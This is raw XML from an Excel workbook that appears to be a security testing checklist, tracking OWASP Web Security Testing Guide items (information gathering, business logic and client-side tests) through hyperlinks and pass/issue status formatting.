          <fgColor rgb="FFEAAA00"/>
          <bgColor rgb="FFEAAA00"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFFFFFF"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FF43B02A"/>
          <bgColor rgb="FF43B02A"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFFFFFF"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FF0091DA"/>
          <bgColor rgb="FF0091DA"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFFFFFF"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FF6D2077"/>
          <bgColor rgb="FF6D2077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eq3ul/Desktop/Mobile_PEN_Workbook/Mobile_App_Security_Checklist-English_1.1.2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GoogleDrive/My%20Drive/Team/Checklist/Mobile_New/Mobile_App_Security_Checklist-English_1.1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Management Summary"/>
      <sheetName val="Security Requirements - Android"/>
      <sheetName val="Anti-RE - Android"/>
      <sheetName val="Security Requirements - iOS"/>
      <sheetName val="Anti-RE - iOS"/>
      <sheetName val="Version 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Security Requirements - Android"/>
      <sheetName val="Security Requirements - iOS"/>
      <sheetName val="Anti-RE - iOS"/>
      <sheetName val="Version history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314F-4186-DD4B-9408-D9F8F19056BD}">
  <sheetPr>
    <tabColor rgb="FFA5A5A5"/>
  </sheetPr>
  <dimension ref="A1:AB942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6.140625" style="2" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="83" style="2" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="12.85546875" style="2" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="14.42578125" style="2" customWidth="1"/>
    <col min="7" max="7" width="10" style="2" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="8.42578125" style="2" customWidth="1"/>
    <col min="9" max="9" width="17.42578125" style="2" bestFit="1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4</v>
      </c>
      <c r="E3" s="88" t="s">
        <v>5</v>
      </c>
      <c r="F3" s="88" t="s">
        <v>6</v>
      </c>
      <c r="G3" s="85" t="s">
        <v>7</v>
      </c>
      <c r="H3" s="85" t="s">
        <v>8</v>
      </c>
      <c r="I3" s="88" t="s">
        <v>9</v>
      </c>
      <c r="J3" s="85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2.95" customHeight="1">
      <c r="A4" s="86"/>
      <c r="B4" s="88"/>
      <c r="C4" s="88"/>
      <c r="D4" s="88"/>
      <c r="E4" s="88"/>
      <c r="F4" s="88"/>
      <c r="G4" s="86"/>
      <c r="H4" s="86"/>
      <c r="I4" s="88"/>
      <c r="J4" s="8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48">
      <c r="A5" s="7" t="s">
        <v>11</v>
      </c>
      <c r="B5" s="8" t="s">
        <v>12</v>
      </c>
      <c r="C5" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/01-Information_Gathering/01-Conduct_Search_Engine_Discovery_Reconnaissance_for_Information_Leakage", "Conduct Search Engine Discovery Reconnaissance for Information Leakage")</f>
        <v>Conduct Search Engine Discovery Reconnaissance for Information Leakage</v>
      </c>
      <c r="D5" s="34" t="s">
        <v>13</v>
      </c>
      <c r="E5" s="11" t="s">
        <v>14</v>
      </c>
      <c r="F5" s="50" t="s">
        <v>15</v>
      </c>
      <c r="G5" s="50" t="s">
        <v>15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2.1" customHeight="1">
      <c r="A6" s="7" t="s">
        <v>17</v>
      </c>
      <c r="B6" s="8" t="s">
        <v>18</v>
      </c>
      <c r="C6" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/01-Information_Gathering/02-Fingerprint_Web_Server", "Fingerprint Web Server")</f>
        <v>Fingerprint Web Server</v>
      </c>
      <c r="D6" s="35" t="s">
        <v>19</v>
      </c>
      <c r="E6" s="16" t="s">
        <v>20</v>
      </c>
      <c r="F6" s="32" t="s">
        <v>21</v>
      </c>
      <c r="G6" s="32" t="s">
        <v>22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48">
      <c r="A7" s="7" t="s">
        <v>23</v>
      </c>
      <c r="B7" s="8" t="s">
        <v>24</v>
      </c>
      <c r="C7" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/01-Information_Gathering/03-Review_Webserver_Metafiles_for_Information_Leakage", "Review Webserver Metafiles for Information Leakage")</f>
        <v>Review Webserver Metafiles for Information Leakage</v>
      </c>
      <c r="D7" s="34" t="s">
        <v>25</v>
      </c>
      <c r="E7" s="11" t="s">
        <v>26</v>
      </c>
      <c r="F7" s="32" t="s">
        <v>27</v>
      </c>
      <c r="G7" s="32" t="s">
        <v>28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48">
      <c r="A8" s="7" t="s">
        <v>29</v>
      </c>
      <c r="B8" s="8" t="s">
        <v>30</v>
      </c>
      <c r="C8" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/01-Information_Gathering/04-Enumerate_Applications_on_Webserver", "Enumerate Applications on Webserver")</f>
        <v>Enumerate Applications on Webserver</v>
      </c>
      <c r="D8" s="41" t="s">
        <v>31</v>
      </c>
      <c r="E8" s="11" t="s">
        <v>32</v>
      </c>
      <c r="F8" s="50" t="s">
        <v>15</v>
      </c>
      <c r="G8" s="50" t="s">
        <v>15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63.95">
      <c r="A9" s="7" t="s">
        <v>33</v>
      </c>
      <c r="B9" s="8" t="s">
        <v>34</v>
      </c>
      <c r="C9" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/01-Information_Gathering/05-Review_Webpage_Content_for_Information_Leakage", "Review Webpage Content for Information Leakage")</f>
        <v>Review Webpage Content for Information Leakage</v>
      </c>
      <c r="D9" s="42" t="s">
        <v>35</v>
      </c>
      <c r="E9" s="11" t="s">
        <v>26</v>
      </c>
      <c r="F9" s="32" t="s">
        <v>27</v>
      </c>
      <c r="G9" s="32" t="s">
        <v>36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2.1">
      <c r="A10" s="7" t="s">
        <v>37</v>
      </c>
      <c r="B10" s="8" t="s">
        <v>38</v>
      </c>
      <c r="C10" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/01-Information_Gathering/06-Identify_Application_Entry_Points", "Identify Application Entry Points")</f>
        <v>Identify Application Entry Points</v>
      </c>
      <c r="D10" s="43" t="s">
        <v>39</v>
      </c>
      <c r="E10" s="18" t="s">
        <v>40</v>
      </c>
      <c r="F10" s="50" t="s">
        <v>15</v>
      </c>
      <c r="G10" s="50" t="s">
        <v>15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2.1">
      <c r="A11" s="7" t="s">
        <v>41</v>
      </c>
      <c r="B11" s="8" t="s">
        <v>42</v>
      </c>
      <c r="C11" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/01-Information_Gathering/07-Map_Execution_Paths_Through_Application", "Map Execution Paths Through Application")</f>
        <v>Map Execution Paths Through Application</v>
      </c>
      <c r="D11" s="42" t="s">
        <v>43</v>
      </c>
      <c r="E11" s="18" t="s">
        <v>44</v>
      </c>
      <c r="F11" s="50" t="s">
        <v>15</v>
      </c>
      <c r="G11" s="50" t="s">
        <v>15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48">
      <c r="A12" s="7" t="s">
        <v>45</v>
      </c>
      <c r="B12" s="8" t="s">
        <v>46</v>
      </c>
      <c r="C12" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/01-Information_Gathering/08-Fingerprint_Web_Application_Framework", "Fingerprint Web Application Framework")</f>
        <v>Fingerprint Web Application Framework</v>
      </c>
      <c r="D12" s="35" t="s">
        <v>47</v>
      </c>
      <c r="E12" s="18" t="s">
        <v>48</v>
      </c>
      <c r="F12" s="33" t="s">
        <v>21</v>
      </c>
      <c r="G12" s="33" t="s">
        <v>49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7.100000000000001">
      <c r="A13" s="7" t="s">
        <v>50</v>
      </c>
      <c r="B13" s="8" t="s">
        <v>51</v>
      </c>
      <c r="C13" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/01-Information_Gathering/09-Fingerprint_Web_Application", "Fingerprint Web Application")</f>
        <v>Fingerprint Web Application</v>
      </c>
      <c r="D13" s="49" t="s">
        <v>52</v>
      </c>
      <c r="E13" s="50" t="s">
        <v>15</v>
      </c>
      <c r="F13" s="50" t="s">
        <v>15</v>
      </c>
      <c r="G13" s="50" t="s">
        <v>15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63.95">
      <c r="A14" s="7" t="s">
        <v>53</v>
      </c>
      <c r="B14" s="8" t="s">
        <v>54</v>
      </c>
      <c r="C14" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/01-Information_Gathering/10-Map_Application_Architecture", "Map Application Architecture")</f>
        <v>Map Application Architecture</v>
      </c>
      <c r="D14" s="35" t="s">
        <v>55</v>
      </c>
      <c r="E14" s="11" t="s">
        <v>56</v>
      </c>
      <c r="F14" s="50" t="s">
        <v>15</v>
      </c>
      <c r="G14" s="50" t="s">
        <v>15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9"/>
      <c r="B15" s="20"/>
      <c r="C15" s="21"/>
      <c r="D15" s="21"/>
      <c r="E15" s="19"/>
      <c r="F15" s="19"/>
      <c r="G15" s="19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>
      <c r="A17" s="23"/>
      <c r="B17" s="23"/>
      <c r="C17" s="24"/>
      <c r="D17" s="24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95">
      <c r="A18" s="25" t="s">
        <v>57</v>
      </c>
      <c r="B18" s="22"/>
      <c r="C18" s="22"/>
      <c r="D18" s="22"/>
      <c r="E18" s="22"/>
      <c r="F18" s="22"/>
      <c r="G18" s="22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8" ht="15.95">
      <c r="A19" s="12" t="s">
        <v>58</v>
      </c>
      <c r="B19" s="22"/>
      <c r="C19" s="22"/>
      <c r="D19" s="22"/>
      <c r="E19" s="22"/>
      <c r="F19" s="22"/>
      <c r="G19" s="22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8" ht="15.95">
      <c r="A20" s="12" t="s">
        <v>59</v>
      </c>
      <c r="B20" s="22"/>
      <c r="C20" s="22"/>
      <c r="D20" s="22"/>
      <c r="E20" s="22"/>
      <c r="F20" s="22"/>
      <c r="G20" s="22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8" ht="15.95">
      <c r="A21" s="12" t="s">
        <v>60</v>
      </c>
      <c r="B21" s="22"/>
      <c r="C21" s="22"/>
      <c r="D21" s="22"/>
      <c r="E21" s="22"/>
      <c r="F21" s="22"/>
      <c r="G21" s="22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8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</sheetData>
  <autoFilter ref="A3:J14" xr:uid="{6DEC4E49-E866-DB47-BB4B-93098970F7F3}">
    <filterColumn colId="7" showButton="0"/>
  </autoFilter>
  <mergeCells count="11">
    <mergeCell ref="G3:G4"/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</mergeCells>
  <conditionalFormatting sqref="H5:H14">
    <cfRule type="cellIs" dxfId="317" priority="46" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H5:H14">
    <cfRule type="cellIs" dxfId="316" priority="47" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H5:H14">
    <cfRule type="cellIs" dxfId="315" priority="48" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H18:H21 I5:J17 I22:J942 I1:J2">
    <cfRule type="containsText" dxfId="314" priority="49" operator="containsText" text="Not started">
      <formula>NOT(ISERROR(SEARCH(("Not started"),(H1))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H18:H21 I5:J17 I22:J942 I1:J2">
    <cfRule type="containsText" dxfId="313" priority="50" operator="containsText" text="In progress">
      <formula>NOT(ISERROR(SEARCH(("In progress"),(H1))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H18:H21 I5:J17 I22:J942 I1:J2">
    <cfRule type="containsText" dxfId="312" priority="51" operator="containsText" text="Done">
      <formula>NOT(ISERROR(SEARCH(("Done"),(H1))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A19">
    <cfRule type="cellIs" dxfId="311" priority="43" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A19">
    <cfRule type="cellIs" dxfId="310" priority="44" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A19">
    <cfRule type="cellIs" dxfId="309" priority="45" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A20">
    <cfRule type="cellIs" dxfId="308" priority="40" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A20">
    <cfRule type="cellIs" dxfId="307" priority="41" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A20">
    <cfRule type="cellIs" dxfId="306" priority="42" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A21">
    <cfRule type="cellIs" dxfId="305" priority="37" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A21">
    <cfRule type="cellIs" dxfId="304" priority="38" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A21">
    <cfRule type="cellIs" dxfId="303" priority="39" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="1">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" prompt="result" sqref="H5:H14" xr:uid="{8C5E074E-4444-6141-A653-D45C3AD50E89}">
      <formula1>$A$19:$A$21</formula1>
    </dataValidation>
  </dataValidations>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0" footer="0"/>
  <pageSetup orientation="portrait"/>
  <ignoredErrors>
    <ignoredError sqref="A12:A14 A5:A1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7E910-3DD6-1C4C-9199-38AC5984774D}">
  <sheetPr>
    <tabColor rgb="FFA5A5A5"/>
  </sheetPr>
  <dimension ref="A1:AB942"/>
  <sheetViews>
    <sheetView showGridLines="0" zoomScaleNormal="100" workbookViewId="0">
      <pane ySplit="4" topLeftCell="A5" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="G5" sqref="G5:G14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68.4257812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381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63.95">
      <c r="A5" s="7" t="s">
        <v>382</v>
      </c>
      <c r="B5" s="27" t="s">
        <v>383</v>
      </c>
      <c r="C5" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/10-Business_Logic_Testing/01-Test_Business_Logic_Data_Validation", "Test Business Logic Data Validation")</f>
        <v>Test Business Logic Data Validation</v>
      </c>
      <c r="D5" s="9" t="s">
        <v>384</v>
      </c>
      <c r="E5" s="11" t="s">
        <v>44</v>
      </c>
      <c r="F5" s="12" t="s">
        <v>134</v>
      </c>
      <c r="G5" s="12" t="s">
        <v>385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8">
      <c r="A6" s="7" t="s">
        <v>386</v>
      </c>
      <c r="B6" s="27" t="s">
        <v>387</v>
      </c>
      <c r="C6" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/10-Business_Logic_Testing/02-Test_Ability_to_Forge_Requests", "Test Ability to Forge Requests")</f>
        <v>Test Ability to Forge Requests</v>
      </c>
      <c r="D6" s="9" t="s">
        <v>388</v>
      </c>
      <c r="E6" s="11" t="s">
        <v>44</v>
      </c>
      <c r="F6" s="12" t="s">
        <v>134</v>
      </c>
      <c r="G6" s="12" t="s">
        <v>385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11.95">
      <c r="A7" s="7" t="s">
        <v>389</v>
      </c>
      <c r="B7" s="27" t="s">
        <v>390</v>
      </c>
      <c r="C7" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/10-Business_Logic_Testing/03-Test_Integrity_Checks", "Test Integrity Checks")</f>
        <v>Test Integrity Checks</v>
      </c>
      <c r="D7" s="53" t="s">
        <v>391</v>
      </c>
      <c r="E7" s="11" t="s">
        <v>392</v>
      </c>
      <c r="F7" s="12" t="s">
        <v>134</v>
      </c>
      <c r="G7" s="12" t="s">
        <v>393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11.95">
      <c r="A8" s="7" t="s">
        <v>394</v>
      </c>
      <c r="B8" s="27" t="s">
        <v>395</v>
      </c>
      <c r="C8" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/10-Business_Logic_Testing/04-Test_for_Process_Timing", "Test for Process Timing")</f>
        <v>Test for Process Timing</v>
      </c>
      <c r="D8" s="53" t="s">
        <v>396</v>
      </c>
      <c r="E8" s="11" t="s">
        <v>44</v>
      </c>
      <c r="F8" s="12" t="s">
        <v>134</v>
      </c>
      <c r="G8" s="12" t="s">
        <v>397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96">
      <c r="A9" s="7" t="s">
        <v>398</v>
      </c>
      <c r="B9" s="27" t="s">
        <v>399</v>
      </c>
      <c r="C9" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/10-Business_Logic_Testing/05-Test_Number_of_Times_a_Function_Can_Be_Used_Limits", "Test Number of Times a Function Can Be Used Limits")</f>
        <v>Test Number of Times a Function Can Be Used Limits</v>
      </c>
      <c r="D9" s="53" t="s">
        <v>400</v>
      </c>
      <c r="E9" s="11" t="s">
        <v>44</v>
      </c>
      <c r="F9" s="12" t="s">
        <v>401</v>
      </c>
      <c r="G9" s="12" t="s">
        <v>402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48">
      <c r="A10" s="7" t="s">
        <v>403</v>
      </c>
      <c r="B10" s="27" t="s">
        <v>404</v>
      </c>
      <c r="C10" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/10-Business_Logic_Testing/06-Testing_for_the_Circumvention_of_Work_Flows", "Testing for the Circumvention of Work Flows")</f>
        <v>Testing for the Circumvention of Work Flows</v>
      </c>
      <c r="D10" s="53" t="s">
        <v>405</v>
      </c>
      <c r="E10" s="11" t="s">
        <v>44</v>
      </c>
      <c r="F10" s="12" t="s">
        <v>134</v>
      </c>
      <c r="G10" s="12" t="s">
        <v>254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28.1">
      <c r="A11" s="7" t="s">
        <v>406</v>
      </c>
      <c r="B11" s="27" t="s">
        <v>407</v>
      </c>
      <c r="C11" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/10-Business_Logic_Testing/07-Test_Defenses_Against_Application_Misuse", "Test Defenses Against Application Misuse")</f>
        <v>Test Defenses Against Application Misuse</v>
      </c>
      <c r="D11" s="53" t="s">
        <v>408</v>
      </c>
      <c r="E11" s="11" t="s">
        <v>44</v>
      </c>
      <c r="F11" s="12" t="s">
        <v>134</v>
      </c>
      <c r="G11" s="12" t="s">
        <v>409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80.099999999999994">
      <c r="A12" s="7" t="s">
        <v>410</v>
      </c>
      <c r="B12" s="27" t="s">
        <v>411</v>
      </c>
      <c r="C12" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/10-Business_Logic_Testing/08-Test_Upload_of_Unexpected_File_Types", "Test Upload of Unexpected File Types")</f>
        <v>Test Upload of Unexpected File Types</v>
      </c>
      <c r="D12" s="53" t="s">
        <v>412</v>
      </c>
      <c r="E12" s="11" t="s">
        <v>44</v>
      </c>
      <c r="F12" s="12" t="s">
        <v>134</v>
      </c>
      <c r="G12" s="12" t="s">
        <v>413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44">
      <c r="A13" s="7" t="s">
        <v>414</v>
      </c>
      <c r="B13" s="27" t="s">
        <v>415</v>
      </c>
      <c r="C13" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/10-Business_Logic_Testing/09-Test_Upload_of_Malicious_Files", "Test Upload of Malicious Files")</f>
        <v>Test Upload of Malicious Files</v>
      </c>
      <c r="D13" s="53" t="s">
        <v>416</v>
      </c>
      <c r="E13" s="11" t="s">
        <v>44</v>
      </c>
      <c r="F13" s="12" t="s">
        <v>134</v>
      </c>
      <c r="G13" s="12" t="s">
        <v>417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48">
      <c r="A14" s="7" t="s">
        <v>418</v>
      </c>
      <c r="B14" s="27" t="s">
        <v>419</v>
      </c>
      <c r="C14" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/10-Business_Logic_Testing/10-Test-Payment-Functionality", "Test Payment Functionality")</f>
        <v>Test Payment Functionality</v>
      </c>
      <c r="D14" s="53" t="s">
        <v>420</v>
      </c>
      <c r="E14" s="11" t="s">
        <v>44</v>
      </c>
      <c r="F14" s="12" t="s">
        <v>134</v>
      </c>
      <c r="G14" s="12" t="s">
        <v>421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9"/>
      <c r="B15" s="20"/>
      <c r="C15" s="21"/>
      <c r="D15" s="21"/>
      <c r="E15" s="19"/>
      <c r="F15" s="19"/>
      <c r="G15" s="19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>
      <c r="A17" s="23"/>
      <c r="B17" s="23"/>
      <c r="C17" s="24"/>
      <c r="D17" s="24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95">
      <c r="A18" s="25" t="s">
        <v>57</v>
      </c>
      <c r="B18" s="20"/>
      <c r="C18" s="21"/>
      <c r="D18" s="21"/>
      <c r="E18" s="22"/>
      <c r="F18" s="22"/>
      <c r="G18" s="22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8" ht="15.95">
      <c r="A19" s="12" t="s">
        <v>58</v>
      </c>
      <c r="B19" s="20"/>
      <c r="C19" s="21"/>
      <c r="D19" s="21"/>
      <c r="E19" s="22"/>
      <c r="F19" s="22"/>
      <c r="G19" s="22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8" ht="15.95">
      <c r="A20" s="12" t="s">
        <v>59</v>
      </c>
      <c r="B20" s="20"/>
      <c r="C20" s="21"/>
      <c r="D20" s="21"/>
      <c r="E20" s="22"/>
      <c r="F20" s="22"/>
      <c r="G20" s="22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8" ht="15.95">
      <c r="A21" s="12" t="s">
        <v>60</v>
      </c>
      <c r="B21" s="20"/>
      <c r="C21" s="21"/>
      <c r="D21" s="21"/>
      <c r="E21" s="22"/>
      <c r="F21" s="22"/>
      <c r="G21" s="22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8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</sheetData>
  <autoFilter ref="A3:J13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6" type="noConversion"/>
  <conditionalFormatting sqref="H5:H13">
    <cfRule type="cellIs" dxfId="98" priority="16" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H5:H13">
    <cfRule type="cellIs" dxfId="97" priority="17" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H5:H13">
    <cfRule type="cellIs" dxfId="96" priority="18" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H18:H21 I5:J13 I22:J942 I1:J2 I15:J17">
    <cfRule type="containsText" dxfId="95" priority="19" operator="containsText" text="Not started">
      <formula>NOT(ISERROR(SEARCH(("Not started"),(H1))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H18:H21 I5:J13 I22:J942 I1:J2 I15:J17">
    <cfRule type="containsText" dxfId="94" priority="20" operator="containsText" text="In progress">
      <formula>NOT(ISERROR(SEARCH(("In progress"),(H1))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H18:H21 I5:J13 I22:J942 I1:J2 I15:J17">
    <cfRule type="containsText" dxfId="93" priority="21" operator="containsText" text="Done">
      <formula>NOT(ISERROR(SEARCH(("Done"),(H1))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A19">
    <cfRule type="cellIs" dxfId="92" priority="13" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A19">
    <cfRule type="cellIs" dxfId="91" priority="14" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A19">
    <cfRule type="cellIs" dxfId="90" priority="15" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A20">
    <cfRule type="cellIs" dxfId="89" priority="10" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A20">
    <cfRule type="cellIs" dxfId="88" priority="11" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A20">
    <cfRule type="cellIs" dxfId="87" priority="12" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A21">
    <cfRule type="cellIs" dxfId="86" priority="7" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A21">
    <cfRule type="cellIs" dxfId="85" priority="8" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A21">
    <cfRule type="cellIs" dxfId="84" priority="9" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H14">
    <cfRule type="cellIs" dxfId="83" priority="1" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H14">
    <cfRule type="cellIs" dxfId="82" priority="2" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H14">
    <cfRule type="cellIs" dxfId="81" priority="3" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I14:J14">
    <cfRule type="containsText" dxfId="80" priority="4" operator="containsText" text="Not started">
      <formula>NOT(ISERROR(SEARCH(("Not started"),(I14))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I14:J14">
    <cfRule type="containsText" dxfId="79" priority="5" operator="containsText" text="In progress">
      <formula>NOT(ISERROR(SEARCH(("In progress"),(I14))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I14:J14">
    <cfRule type="containsText" dxfId="78" priority="6" operator="containsText" text="Done">
      <formula>NOT(ISERROR(SEARCH(("Done"),(I14))))</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="1">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" prompt="result" sqref="H5:H14" xr:uid="{CA39A2E7-2FD6-C04C-B6C7-CB21E16D5D58}">
      <formula1>$A$19:$A$21</formula1>
    </dataValidation>
  </dataValidations>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0" footer="0"/>
  <pageSetup orientation="portrait"/>
  <ignoredErrors>
    <ignoredError sqref="A5:A1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FC5E0-88F5-234D-B37A-E8569AD84E45}">
  <sheetPr>
    <tabColor rgb="FFA5A5A5"/>
  </sheetPr>
  <dimension ref="A1:AB946"/>
  <sheetViews>
    <sheetView showGridLines="0" zoomScaleNormal="100" workbookViewId="0">
      <pane ySplit="4" topLeftCell="A5" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="G5" sqref="G5:G18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59.710937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39" customHeight="1">
      <c r="A1" s="87" t="s">
        <v>422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7.100000000000001" customHeight="1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48">
      <c r="A5" s="7" t="s">
        <v>423</v>
      </c>
      <c r="B5" s="27" t="s">
        <v>424</v>
      </c>
      <c r="C5" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_DOM-based_Cross_Site_Scripting", "Testing for DOM-Based Cross Site Scripting")</f>
        <v>Testing for DOM-Based Cross Site Scripting</v>
      </c>
      <c r="D5" s="53" t="s">
        <v>425</v>
      </c>
      <c r="E5" s="11" t="s">
        <v>44</v>
      </c>
      <c r="F5" s="12" t="s">
        <v>267</v>
      </c>
      <c r="G5" s="12" t="s">
        <v>268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2.1">
      <c r="A6" s="7" t="s">
        <v>426</v>
      </c>
      <c r="B6" s="27" t="s">
        <v>427</v>
      </c>
      <c r="C6" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/11-Client-side_Testing/02-Testing_for_JavaScript_Execution", "Testing for JavaScript Execution")</f>
        <v>Testing for JavaScript Execution</v>
      </c>
      <c r="D6" s="53" t="s">
        <v>428</v>
      </c>
      <c r="E6" s="11" t="s">
        <v>44</v>
      </c>
      <c r="F6" s="12" t="s">
        <v>267</v>
      </c>
      <c r="G6" s="12" t="s">
        <v>268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48">
      <c r="A7" s="7" t="s">
        <v>429</v>
      </c>
      <c r="B7" s="27" t="s">
        <v>430</v>
      </c>
      <c r="C7" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/11-Client-side_Testing/03-Testing_for_HTML_Injection", "Testing for HTML Injection")</f>
        <v>Testing for HTML Injection</v>
      </c>
      <c r="D7" s="53" t="s">
        <v>431</v>
      </c>
      <c r="E7" s="11" t="s">
        <v>44</v>
      </c>
      <c r="F7" s="12" t="s">
        <v>267</v>
      </c>
      <c r="G7" s="12" t="s">
        <v>432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48">
      <c r="A8" s="7" t="s">
        <v>433</v>
      </c>
      <c r="B8" s="27" t="s">
        <v>434</v>
      </c>
      <c r="C8" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/11-Client-side_Testing/04-Testing_for_Client-side_URL_Redirect", "Testing for Client-side URL Redirect")</f>
        <v>Testing for Client-side URL Redirect</v>
      </c>
      <c r="D8" s="54" t="s">
        <v>435</v>
      </c>
      <c r="E8" s="11" t="s">
        <v>44</v>
